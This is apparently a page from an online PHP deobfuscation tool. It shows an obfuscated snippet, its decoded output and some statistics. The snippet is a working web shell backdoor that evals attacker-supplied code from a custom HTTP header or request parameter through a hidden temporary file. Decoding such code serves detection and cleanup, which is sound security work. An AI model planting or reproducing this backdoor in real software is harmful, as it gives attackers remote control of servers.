Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$_HEADERS = getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Contro..
Decoded Output download
<? $_HEADERS = getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Control'])){$c="<?php @eval($_HEADERS["Large-Allocation\"]);@eval($_REQUEST["Large-Allocation"]);";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
?>
Did this file decode correctly?
Original Code
$_HEADERS = getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Control'])){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x4ca\x72\x67e\x2d\x41l\x6c\x6fc\x61\x74i\x6f\x6e\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fR\x45\x51U\x45\x53T\x5b\x22L\x61\x72g\x65\x2dA\x6c\x6co\x63\x61t\x69\x6fn\x22\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
Function Calls
getallheaders | 1 |
Stats
MD5 | 4f11679a4f00a6ba8ea0fb4acbfd4e59 |
Eval Count | 0 |
Decode Time | 42 ms |